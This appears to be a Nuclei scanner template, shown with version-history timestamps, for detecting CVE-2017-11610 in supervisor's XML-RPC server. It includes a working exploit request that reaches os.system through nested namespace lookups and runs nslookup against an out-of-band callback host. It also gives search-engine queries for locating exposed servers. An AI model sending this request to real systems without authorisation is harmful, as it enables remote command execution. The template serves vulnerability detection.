2021-11-15 23:27:25 +00:00
id : CVE-2017-11610
info :
2022-06-09 20:35:21 +00:00
name : XML-RPC Server - Remote Code Execution
2021-11-15 23:27:25 +00:00
author : notnotnotveg
2021-11-17 13:10:53 +00:00
severity : high
2022-06-09 20:35:21 +00:00
description : The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or disable the XML-RPC server if not required.
2021-11-15 23:27:25 +00:00
reference :
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
2022-05-17 09:18:12 +00:00
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/
2023-07-11 19:49:27 +00:00
- http://www.debian.org/security/2017/dsa-3942
2021-11-17 13:10:53 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-11-17 13:10:53 +00:00
cve-id : CVE-2017-11610
cwe-id : CWE-276
2024-05-31 19:23:20 +00:00
epss-score : 0.9745
epss-percentile : 0.9995
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : supervisord
product : supervisor
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"Supervisor Status"
- http.title:"supervisor status"
2024-05-31 19:23:20 +00:00
fofa-query : title="supervisor status"
google-query : intitle:"supervisor status"
2024-01-14 09:21:50 +00:00
tags : cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord
2021-11-15 23:27:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-17 13:19:32 +00:00
- raw :
2021-11-15 23:27:25 +00:00
- |
POST /RPC2 HTTP/1.1
Host : {{Hostname}}
Accept : text/xml
Content-type : text/xml
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
2022-01-03 10:33:08 +00:00
<string>nslookup {{interactsh-url}}</string>
2021-11-15 23:27:25 +00:00
</param>
</params>
</methodCall>
2022-01-06 08:24:40 +00:00
matchers-condition : and
2021-11-15 23:27:25 +00:00
matchers :
- type : word
2021-11-17 13:06:30 +00:00
part : interactsh_protocol
2021-11-15 23:27:25 +00:00
words :
2022-01-03 10:33:08 +00:00
- "dns"
2022-01-06 08:24:40 +00:00
- type : word
part : header
words :
- "text/xml"
- type : word
part : body
words :
- "<methodResponse>"
- "<int>"
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022035f43b6eaf413ec6cf42ec9e01229c052625ec793f772dff4948fa29acc77c55022100c149c66e8b68bb49a2e0e36ad115b66ae41b4b2745133b3fd9f7d83b51a10874:922c64590222798bb761d5b6d8e72950